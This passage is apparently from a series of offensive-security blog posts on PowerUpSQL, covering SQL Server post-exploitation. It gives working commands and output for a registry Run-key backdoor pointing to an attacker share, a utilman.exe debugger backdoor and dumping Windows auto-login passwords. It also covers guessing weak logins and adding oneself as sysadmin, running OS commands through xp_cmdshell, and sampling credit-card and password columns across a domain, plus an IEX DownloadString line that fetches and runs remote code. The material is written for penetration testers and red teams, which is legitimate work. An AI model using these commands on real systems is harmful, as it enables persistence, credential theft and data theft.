    There are lots of preventative and detective control products out there. Most of the mature options are commercial, but the open source options are getting better. Also, don’t be afraid to get a little dirty and write some of your own tools. Naturally this can include things like HIDS, HIPS, NIDS, NIPS, SIEM, DLP, honeypots, tarpits, and canaries. I’m personally a big fan of canaries – they are cheap and can be really effective.
  4. Be creative.
    For example, many endpoint protection suites can detect common scanning activity on the LAN in the absence of internal net flow data.
  5. Audit for high impact security events. Make sure you have coverage for the most common IoCs and IoAs at each layer of your environment. This one seems obvious, but a lot of companies miss common high impact events.
  6. Work with your red team to test controls.
    In my experience, you get the most value out of red team engagements when the red and blue teams work together to understand attacks in depth. That collaboration generally leads to better preventative and detective controls. While performing offensive actions against implemented controls, consider asking the following basic questions to help ensure ongoing improvement:
    1. Were any security events logged for the attack? (Where, Why/Why not?)
    2. Did the security events trigger alerts? (Where, Why/Why not?)
    3. Did the security events trigger an incident response ticket? (Where, Why/Why not?)

Conclusion

Go purple team! Naturally, every red team engagement has different goals and collaborating with the blue team isn’t always going to align with them. However, if one of your goals is to test the effectiveness of the technical detective controls in place, then working together will yield much better results than doing everything in a silo. Hopefully this was helpful. Have fun and hack responsibly!

Establishing Registry Persistence via SQL Server with PowerUpSQL

In this blog I’ll show how to use PowerUpSQL to establish persistence (backdoor) via the Windows registry through SQL Server. I’ll also provide a brief overview of the xp_regwrite stored procedure. This should be interesting to pentesters and red teamers interested in some alternative ways to access the OS through SQL Server.

An overview of xp_regwrite

xp_regwrite is an undocumented native extended stored procedure in SQL Server. Since it’s been around since SQL Server 2000 I use the term “undocumented” loosely. It allows logins to create and edit Windows registry keys without having to enable and use xp_cmdshell. The downside (from the attacker’s perspective) is that it can only be executed by a sysadmin. While that restriction usually rules it out as a privilege escalation vector, it is incredibly handy during post exploitation. The registry is integrated into most aspects of the Windows operating system, so you’re only limited by your imagination and the SQL Server service account. Similar to other extended stored procedures, xp_regwrite executes with the SQL Server service account’s privileges. So if it can write to the registry as LocalSystem, then so can you. While the sky is the limit, at the end of the day I’m still a pentester at heart. So I thought it would be useful to show how to use xp_regwrite to establish persistence. There are hundreds of registry keys (if not more) that can lead to command execution, but the two examples below seem to be some of the most common.

PowerUpSQL primer

Before we get started, if you would like an overview of PowerUpSQL check out the blog here. Also, if you just want to learn how to use PowerUpSQL to discover SQL Servers check out this blog.

Using CurrentVersionRun to establish persistence with xp_regwrite

The example below shows how to use xp_regwrite to add a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry key. The command will be run automatically anytime a user logs into Windows.
---------------------------------------------
-- Use SQL Server xp_regwrite to configure 
-- a file to run via UNC Path when users login
----------------------------------------------
EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'Software\Microsoft\Windows\CurrentVersion\Run',
@value_name  = 'EvilSauce',
@type        = 'REG_SZ',
@value       = '\\EvilBox\EvilSandwich.exe'
I wrote that functionality into the PowerUpSQL “Get-SQLPersistRegRun” function to make the task a little easier. The example below shows how to run a simple PowerShell command, but in the real world it would do something evil. This type of persistence is also supported by The Metasploit Framework and PowerShell Empire.
PS C:\> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command 'PowerShell.exe -C "Write-Output hacker | Out-File C:\temp\iamahacker.txt"' -Instance "SQLServer1\STANDARDDEV2014"
VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write value: PureEvil
VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C "Write-Output hacker | Out-File C:\temp\iamahacker.txt"
VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1\STANDARDDEV2014 : Done.
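If you want to sanity check that the value actually landed, you can read it back with xp_regread. Below is a minimal sketch, assuming sysadmin privileges and PowerUpSQL's generic Get-SQLQuery function:
PS C:\> Get-SQLQuery -Instance "SQLServer1\STANDARDDEV2014" -Query "EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','PureEvil'"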
The example below shows how to run a simple command from an attacker-controlled share via a UNC path, similar to the TSQL example.
PS C:\> Get-SQLPersistRegRun -Verbose -Name EvilSauce -Command "\\EvilBox\EvilSandwich.exe" -Instance "SQLServer1\STANDARDDEV2014"
VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write value: EvilSauce
VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: \\EvilBox\EvilSandwich.exe
VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1\STANDARDDEV2014 : Done.

Setting a debugger for accessibility options using xp_regwrite

This is a cool persistence method, because no user interaction is required to execute commands on the system, which I prefer of course. :) The example below shows how to configure a debugger for utilman.exe, which will run cmd.exe when it’s called. That includes when you’re at the login screen. After it’s been executed, it’s possible to RDP to the system and launch cmd.exe with the Windows key + U key combination.
EXEC master..xp_regwrite
@rootkey     = 'HKEY_LOCAL_MACHINE',
@key         = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe',
@value_name  = 'Debugger',
@type        = 'REG_SZ',
@value       = '"c:\windows\system32\cmd.exe"'
Note: If network level authentication is enabled you won’t have enough access to see the logon screen and you may have to consider other options for command execution. Of course, that's just another registry setting. ;) I’ve written a PowerUpSQL function for this too, called “Get-SQLPersistRegDebugger”. Below is the utilman.exe example.
PS C:\> Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe -Command 'c:\windows\system32\cmd.exe' -Instance "SQLServer1\STANDARDDEV2014"
VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write debugger for: utilman.exe
VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: c:\windows\system32\cmd.exe
VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written.
VERBOSE: SQLServer1\STANDARDDEV2014 : Done.
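When the engagement wraps up, don't forget to remove the debugger entry. Below is a cleanup sketch that assumes the companion xp_regdeletevalue extended stored procedure is available on the instance:
PS C:\> Get-SQLQuery -Instance "SQLServer1\STANDARDDEV2014" -Query "EXEC master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe','Debugger'"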

Wrap Up

Even though the xp_regwrite extended stored procedure is only executable by sysadmins, it’s still incredibly handy during post exploitation. To illustrate that point I created two PowerUpSQL functions to establish persistence in Windows through SQL Server using xp_regwrite. Hopefully this has been useful and will get you thinking about other things xp_regwrite can do for you. Good luck and hack responsibly!

Get Windows Auto Login Passwords via SQL Server with PowerUpSQL

In this blog I’ll show how to use PowerUpSQL to dump Windows auto login passwords through SQL Server. I’ll also talk about other ways the xp_regread stored procedure can be used during pentests.

A brief history of xp_regread

The xp_regread extended stored procedure has been around since SQL Server 2000. The original version allowed members of the Public server role to access pretty much anything the SQL Server service account had privileges to. At the time, it had a pretty big impact, because it was common for SQL Servers to run as LocalSystem. Since SQL Server 2000 SP4 was released, the impact of xp_regread has been pretty minimal due to a few access controls that were added to help prevent low privileged logins from accessing sensitive registry locations. Nowadays, the only registry locations accessible to unprivileged users are related to SQL Server. For a list of those locations you can visit https://support.microsoft.com/en-us/kb/887165. Below are a few of the more interesting accessible paths:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Search
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQLServer
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Messaging Subsystem
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\SQLServer
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLServer
  • HKEY_CURRENT_USER\Software\Microsoft\Mail
  • HKEY_CURRENT_USER\Control Panel\International

Practical uses for xp_regread with the Public Role

Even with our hands tied, xp_regread can be used to grab a lot of useful information. In fact, when logged in as a least privilege login, I often use it to grab server information that I couldn’t get anywhere else. For example, the Get-SQLServerInfo function in PowerUpSQL includes some of those queries.
PS C:\> Get-SQLServerInfo
ComputerName           : SQLServer1
Instance               : SQLServer1
DomainName             : demo.local
ServiceName            : MSSQLSERVER
ServiceAccount         : NT Service\MSSQLSERVER
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : demo\user
IsSysadmin             : Yes
ActiveSessions         : 3
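Under the hood, details like the authentication mode can be pulled straight out of the allowed registry paths with xp_regread. Below is a sketch that assumes a default instance, the standard LoginMode value (1 = Windows only, 2 = mixed mode), and PowerUpSQL's generic Get-SQLQuery function:
PS C:\> Get-SQLQuery -Instance "SQLServer1" -Query "EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\MSSQLServer','LoginMode'"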
The access control restrictions implemented in SQL Server 2000 SP4 do not apply to sysadmins. As a result, anything the SQL Server service account can access in the registry, a sysadmin can access via xp_regread. At first glance this may not seem like a big deal, but it does allow us to pull sensitive data from the registry without having to enable xp_cmdshell, which can trigger a lot of alarms when it’s enabled and used. So xp_regread actually ends up being handy for basic SQL Server post exploitation tasks.

Recovering Windows Auto Login Credentials with xp_regread

It’s possible to configure Windows to log in automatically when the computer is started. While this is not a common configuration in corporate environments, it’s something we see frequently in retail environments. Especially those that support legacy POS terminals and kiosks with SQL Servers running locally. In most cases, when Windows is configured to log in automatically, unencrypted credentials are stored in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Using that information we can write a basic TSQL script that uses xp_regread to pull the auto login credentials out of the registry for us without having to enable xp_cmdshell. Below is an example TSQL script, but since the registry paths aren't on the allowed list we have to run the query as a sysadmin:
-------------------------------------------------------------------------
-- Get Windows Auto Login Credentials from the Registry
-------------------------------------------------------------------------

-- Get AutoLogin Default Domain
DECLARE @AutoLoginDomain  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultDomainName',
@value            = @AutoLoginDomain output

-- Get AutoLogin DefaultUsername
DECLARE @AutoLoginUser  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultUserName',
@value            = @AutoLoginUser output

-- Get AutoLogin DefaultPassword
DECLARE @AutoLoginPassword  SYSNAME
EXECUTE master.dbo.xp_regread
@rootkey        = N'HKEY_LOCAL_MACHINE',
@key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
@value_name        = N'DefaultPassword',
@value            = @AutoLoginPassword output 

-- Display Results
SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword
I’ve also created a PowerUpSQL function called “Get-SQLRecoverPwAutoLogon” so you can run it on scale. It will recover the default Windows auto login information and the alternative Windows auto login information if it has been set. Then it returns the associated domain name, user name, and password. Below is a command example for those who are interested. If you're interested in learning about blindly targeting SQL Server, you can peek at this blog.
PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”}
PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose
VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : Connection Success.
VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done.
VERBOSE: SQLServer3.demo.local\2014 : Connection Success.
VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done.

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : KioskAdmin
Password     : test

ComputerName : SQLServer1
Instance     : SQLServer1\Instance1
Domain       : demo.local
UserName     : kioskuser
Password     : KioskUserPassword!

Wrap Up

Even though the xp_regread extended stored procedure has been partially neutered, there are still a number of ways that it can prove useful during penetration tests and red team engagements. Hopefully you’ll have some fun with the “Get-SQLServerInfo” and “Get-SQLRecoverPwAutoLogon” functions that build off of its capabilities. More registry fun to come. In the meantime, good luck and hack responsibly!

Finding Weak Passwords for Domain SQL Servers on Scale using PowerUpSQL

In this blog, I’ll show how to use PowerUpSQL to quickly identify SQL logins configured with weak passwords on domain SQL Servers, using a standard domain account. We’ve used the techniques described below to obtain access to sensitive data and elevate privileges on SQL Servers. In many cases, the identified weak passwords also lead to domain privilege escalation via sysadmin access. Hopefully this blog will be interesting to pentesters, red teamers, and administrators looking for another tool for auditing their SQL Servers for weak configurations.

Finding Domain SQL Servers to Log Into

I touched on how to do this in another blog, so I’ve only provided a summary of the PowerUpSQL commands below. For more information on how to discover accessible SQL Servers check out https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/.
  1. Download PowerUpSQL. https://github.com/NetSPI/PowerUpSQL
  2. Import the Module
    PS C:\> Import-Module PowerUpSQL.psd1
  3. Get a list of accessible SQL Servers on the domain.
    PS C:\> $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10
  4. View accessible servers
    PS C:\> $Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”}
    PS C:\> $Accessible
    
    ComputerName   Instance                       Status    
    ------------   --------                       ------    
    SQLServer1     SQLServer1\SQLEXPRESS          Accessible
    SQLServer1     SQLServer1\STANDARDDEV2014     Accessible
    SQLServer1     SQLServer1                     Accessible

Enumerating SQL Logins as a Domain User

By default, non-sysadmin logins in SQL Server don’t have privileges to select a list of SQL logins from the standard tables. However, functions exist in SQL Server that allow least privilege logins to do it anyways using basic fuzzing techniques. That means any user that can log into SQL Server can get a full user list. For the details check out this blog. The PowerUpSQL “Invoke-SQLAuditWeakLoginPw” function can be used to automatically fuzz login names and attempt to identify weak passwords. By default, the function will only test the login as the password, and “password” as the password. So only two passwords will be attempted for each enumerated login. However, custom user and password lists can be provided. At first glance this doesn’t seem like a big deal. However, in large environments this simple attack has been yielding hundreds of weak passwords on accessible SQL Servers using normal domain user accounts.
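If you want to see the login enumeration step on its own, PowerUpSQL also ships a dedicated function for it. Below is a sketch that fuzzes server principal IDs to recover the login list as a least privilege user (assuming the Get-SQLFuzzServerLogin function and its default ID range):
PS C:\> Get-SQLFuzzServerLogin -Instance "SQLServer1\Instance1" -Verbose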

Identifying Weak SQL Server Passwords on Scale using PowerUpSQL

Below are a few examples showing how to use the “Invoke-SQLAuditWeakLoginPw” function with the accessible SQL Server list we obtained in the last section. Note: All of the examples shown are run as the current Windows user, but alternative SQL Server login credentials can be provided.
PS C:\> $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose

ComputerName  : SQLServer1
Instance      : SQLServer1\EXPRESS
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The testuser (Not Sysadmin) is configured with the password testuser.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

ComputerName  : SQLServer1
Instance      : SQLServer1\Express
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The testadmin (Sysadmin) is configured with the password testadmin.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016
The function also supports automatically adding your current login to the sysadmin fixed server role if a sysadmin password is guessed by the script. Below is an example.
PS C:\> Invoke-SQLAuditWeakLoginPw –Verbose –Instance server\instance –Exploit

..[snip]..

ComputerName  : SQLServer1
Instance      : SQLServer1\Express
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy.
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : Yes
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The testadmin (Sysadmin) is configured with the password testadmin.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

..[snip]..

Or you could attempt to add yourself as a sysadmin on all accessible servers...
PS C:\> $Accessible | Invoke-SQLAuditWeakLoginPw –Verbose –Exploit
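And if you need to authenticate with a SQL login instead of the current Windows user, as noted earlier, you can supply credentials. Below is a sketch using the standard -Username and -Password parameters shared by most PowerUpSQL functions; the credentials shown are placeholders:
PS C:\> $Accessible | Invoke-SQLAuditWeakLoginPw -Verbose -Username audituser -Password 'AuditUserPassword!'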

Executing OS Commands on SQL Servers with PowerUpSQL

If you were able to escalate privileges using the commands from the previous section then you’re ready to execute OS commands on the SQL Server. The local and domain privileges you’ll have will vary depending on the SQL Server service account being used. It’s very common to see a single domain account being used to run a large portion of the SQL Servers in the environment. However, it’s also very common for SQL Servers to be configured to run as LocalSystem or a managed service account. Below is the PowerUpSQL example showing how to execute OS commands on affected SQL Servers:
PS C:\> Invoke-SQLOSCmd –Verbose –Instance SQLServer1\Express –Command “dir c:\windows\system32\Drivers\etc” –RawResults

VERBOSE: Creating runspace pool and session states
VERBOSE: SQLSERVER1\EXPRESS: Connection Success.
VERBOSE: SQLSERVER1\EXPRESS: You are a sysadmin.
VERBOSE: SQLSERVER1\EXPRESS: Show Advanced Options is already enabled.
VERBOSE: SQLSERVER1\EXPRESS: xp_cmdshell is already enabled.
VERBOSE: SQLSERVER1\EXPRESS: Running command: dir c:\windows\system32\Drivers\etc
 Volume in drive C is OSDisk
 Volume Serial Number is C044-F8BC
 Directory of c:\windows\system32\Drivers\etc
07/16/2016  08:42 PM    <DIR>          .
07/16/2016  08:42 PM    <DIR>          ..
09/22/2015  10:16 AM               851 hosts
08/22/2013  10:35 AM             3,683 lmhosts.sam
08/22/2013  08:25 AM               407 networks
08/22/2013  08:25 AM             1,358 protocol
08/22/2013  08:25 AM            17,463 services
               5 File(s)         23,762 bytes
               2 Dir(s)  142,140,887,040 bytes free
VERBOSE: Closing the runspace pool
Or if you would like to run commands on multiple servers you can use the example below.
PS C:\>$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10

ComputerName   Instance                       CommandResults              
------------   --------                       --------------                   
SQLServer1     SQLServer1\SQLEXPRESS          nt service\mssql$sqlexpress 
SQLServer1     SQLServer1\STANDARDDEV2014     nt authority\system         
SQLServer1     SQLServer1                     Domain\SQLSvc

Wrap Up

In this blog, I provided an overview of how to use the PowerUpSQL function "Invoke-SQLAuditWeakLoginPw" to quickly identify SQL Server logins configured with weak passwords on ADS domains. While the function doesn't offer any new techniques, it does provide more automation than the scripts I've provided in the past. As a result, it has the potential to provide unauthorized data access and additional domain privileges in most large environments. It's also worth noting that the "Invoke-SQLEscalatePriv" function attempts to exploit this issue along with others when it's run. Good luck and hack responsibly!

Finding Sensitive Data on Domain SQL Servers using PowerUpSQL

In this blog I’ll show how PowerUpSQL can be used to rapidly target and sample sensitive data stored in SQL Server databases associated with Active Directory domains. We’ve used the techniques below to discover millions of PCI, HIPAA, and other sensitive records living inside and outside of protected network zones. Hopefully PowerUpSQL can help you do the same.

Finding Domain SQL Servers to Log Into

I touched on how to do this in another blog so I’ve only provided a summary of the PowerUpSQL commands below. For more information on how to discover accessible SQL Servers check out https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/.
  1. Download PowerUpSQL.https://github.com/NetSPI/PowerUpSQL
  2. Import the Module
    PS C:\> Import-Module PowerUpSQL.psd1
  3. Get a list of accessible SQL Servers on the domain.
    PS C:\> $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10
  4. View accessible servers
    PS C:\> $Accessible = $Servers | Where-Object {$_.Status –eq “Accessible”}
    PS C:\> $Accessible
    
    ComputerName   Instance                       Status    
    ------------   --------                       ------    
    SQLServer1     SQLServer1\SQLEXPRESS          Accessible
    SQLServer1     SQLServer1\STANDARDDEV2014     Accessible
    SQLServer1     SQLServer1                     Accessible
Pro tip: Once you've obtained Domain Admin privileges, add yourself to the DBA groups and run through the process again. More access = more data. :)
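Below is a sketch of that pro tip. It assumes the RSAT ActiveDirectory PowerShell module is available and that a hypothetical "SQL Admins" domain group gates DBA access in your environment:
# Add the compromised account to the (hypothetical) domain group that maps to DBA access
Import-Module ActiveDirectory
Add-ADGroupMember -Identity "SQL Admins" -Members myuser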

Finding Sensitive Data on Domain SQL Servers

If you followed the instructions in the last section you should have a variable named "$Accessible" that contains a list of all accessible SQL Server instances. The command below uses that variable to perform a broad search across all accessible SQL Servers for database table column names that contain provided keywords. I've created an example showing one server, but in real environments there are often hundreds.
PS C:\> $Accessible | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults | ft -AutoSize

...[SNIP]...

VERBOSE: SQLServer1\STANDARDDEV2014 : START SEARCH DATA BY COLUMN
VERBOSE: SQLServer1\STANDARDDEV2014 : CONNECTION SUCCESS
VERBOSE: SQLServer1\STANDARDDEV2014 : - Searching for column names that match criteria...
VERBOSE: SQLServer1\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card]
VERBOSE: SQLServer1\STANDARDDEV2014 : - Selecting 2 rows of data sample from column [testdb].[dbo].[tracking].[card].
VERBOSE: SQLServer1\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN

...[SNIP]...

ComputerName   Instance                   Database Schema Table    Column Sample           RowCount IsCC
------------   --------                   -------- ------ -----    ------ ------           -------- ----
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   4111111111111111 2        True
SQLServer1     SQLServer1\STANDARDDEV2014 testdb   dbo    tracking card   41111111111ASDFD 2        False

...[SNIP]...
Below is a breakdown of what the command does:
  • It runs 10 concurrent host threads at a time
  • It searches accessible domain SQL Servers for database table columns containing the keywords “card” or “password”
  • It grabs two sample records from each matching column
  • It checks if the sample data contains a credit card number using the Luhn formula
  • It filters out all default databases
If you want to target a single server you can also use the command below.
Get-SQLColumnSampleData –Verbose –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults  –Instance “Server1\Instance1”

Targeting Potentially Sensitive Databases

To save time in larger environments you may want to be a little more picky about what servers you're targeting during data searches. Especially if you’re searching for multiple keywords. Dumping a list of databases and their properties can give you the information you need to make better server targeting decisions. Some key pieces of information include:
  • Database Name: This is the most intuitive. Databases are often named after the associated application or the type of data they contain.
  • is_encrypted Flag: This tells us if transparent encryption is used. People tend to encrypt things they want to protect so these databases make good targets. ;) Transparent encryption is intended to protect data at rest, but if we log in as a sysadmin, SQL Server will do the work of decrypting it for us. A big thanks goes out to James Houston for sharing that trend with us.
  • Database File Size: The database file size can help you determine if the database is actually being used. The bigger the database, the more data to sample. :)
To dump a list of all accessible SQL Server databases you can use the command below. Once again, we'll use the "$Accessible" variable we created earlier. Storing the accessible servers in a variable allows us to quickly execute different PowerUpSQL functions against those servers without having to run the discovery commands again. Note: The example only shows a sample of the output for one record, but in most environments you would have a lot more.
PS C:\> $Databases = $Accessible | Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults
PS C:\> $Databases

...[SNIP]...

ComputerName        : SQLServer1
Instance            : SQLServer1\STANDARDDEV2014
DatabaseId          : 7
DatabaseName        : testdb
DatabaseOwner       : sa
OwnerIsSysadmin     : 1
is_trustworthy_on   : True
is_db_chaining_on   : False
is_broker_enabled   : True
is_encrypted        : True
is_read_only        : False
create_date         : 4/13/2016 4:27:36 PM
recovery_model_desc : FULL
FileName            : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf
DbSizeMb            : 3.19
has_dbaccess        : 1

...[SNIP]...
Once the results are stored in the "$Databases" variable there are a ton of ways to view the data. Below are some of the more common options. In the examples, the results are sorted by the database name alphabetically.
# Output results to display
$Databases | Sort-Object DatabaseName

# Output results to display in table format
$Databases | Sort-Object DatabaseName | Format-Table -AutoSize

# Output results to pop grid with search functionality
$Databases | Sort-Object DatabaseName | Out-GridView

# Output results to a csv file
$Databases | Sort-Object DatabaseName | Export-Csv -NoTypeInformation  C:\temp\databases.csv
If you're only interested in encrypted databases you can use the command below.
$Databases | Where-Object {$_.is_encrypted –eq “TRUE”}
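To shortlist the biggest targets first, you can also sort on the size property. Below is a sketch using the DbSizeMb and is_encrypted properties shown in the output above; the cast handles the size being returned as a string:
# Show the ten largest databases along with their encryption flag
$Databases | Sort-Object {[double]$_.DbSizeMb} -Descending | Select-Object Instance, DatabaseName, DbSizeMb, is_encrypted -First 10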
The "$Databases" output can also be piped directly into the Get-SQLColumnSampleDataThreaded command as shown below.
$Databases | Where-Object {$_.is_encrypted –eq “TRUE”} | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “card, password” –SampleSize 2 –ValidateCC -NoDefaults
Of course, some people are not fans of multi-step commands...

Bringing it All Together

If you prefer to fully automate your data sampling experience everything can be executed as a single command. Below is an example:
Get-SQLInstanceDomain -Verbose | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults |
Export-CSV –NoTypeInformation c:\temp\datasample.csv

Wrap Up

In this blog I showed how sensitive data could be targeted and quickly sampled from domain SQL Servers using PowerUpSQL. I also noted that databases that use transparent encryption tend to make good targets for review. Hopefully the scripts will save you as much time as they’ve saved us. Either way, good luck and hack responsibly!

Blindly Discover SQL Server Instances with PowerUpSQL

In this blog I’ll show how PowerUpSQL can be used to blindly discover SQL Server instances on a system, network, or domain. This is an essential first step if you’re planning to search for sensitive data on SQL Servers, or plan to use SQL Servers as a means to escalate privileges on the domain.

Importing PowerUpSQL

Before we get started, you’ll have to get the PowerUpSQL module imported. Below are some basic instructions. For more options visit the GitHub project here.
  1. Download PowerUpSQL.https://github.com/NetSPI/PowerUpSQL
  2. Import the Module
    PS C:\> Import-Module PowerUpSQL.psd1
Alternatively, you can load it with the PowerShell command below.
PS C:\> IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Discover SQL Server Instances with PowerUpSQL

Below is an overview of the PowerUpSQL discovery functions that can be used for enumerating SQL Server instances from different attacker perspectives. Each of them supports the PowerShell pipeline so that they can be used with other PowerUpSQL functions.

Get-SQLInstanceLocal

This command should be used if you’ve already compromised a system and would like a list of the local SQL Server instances. It uses the local registry entries to find them. Below are a few example commands.
# Get a list of local SQL Server instances
PS C:\>Get-SQLInstanceLocal    

ComputerName       : SQLServer1
Instance           : SQLServer1\SQLEXPRESS
ServiceDisplayName : SQL Server (SQLEXPRESS)
ServiceName        : MSSQL$SQLEXPRESS
ServicePath        : "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
ServiceAccount     : NT Service\MSSQL$SQLEXPRESS
State              : Running

For more instance information pipe the Get-SQLInstanceLocal into Get-SQLServerInfo:
# Get a list of server information for each local instance
PS C:\>Get-SQLInstanceLocal | Get-SQLServerInfo

ComputerName           : SQLServer1
Instance               : SQLServer1\SQLEXPRESS
DomainName             : NETSPI
ServiceName            : MSSQL$SQLEXPRESS
ServiceAccount         : NT Service\MSSQL$SQLEXPRESS
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Express Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : Domain\User
IsSysadmin             : Yes
ActiveSessions         : 1

Get-SQLInstanceScanUDP

If you’re starting from an unauthenticated local network position then this function can come in handy. It returns SQL Server instances on the network from a UDP scan. It accepts a piped list of computer names or IP addresses. The example below shows how to run the UDP scan and display output to the console:
PS C:\>Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 

ComputerName : SQLServer1
Instance     : SQLServer1\SQLEXPRESS
InstanceName : SQLEXPRESS
ServerIP     : 10.1.1.12
TCPPort      : 50213
BaseVersion  : 12.0.4100.1
IsClustered  : No

ComputerName : SQLServer1
Instance     : SQLServer1\Standard
InstanceName : Standard
ServerIP     : 10.1.1.12
TCPPort      : 50261
BaseVersion  : 12.0.4100.1
IsClustered  : No

ComputerName : SQLServer2
Instance     : SQLServer2\AppName
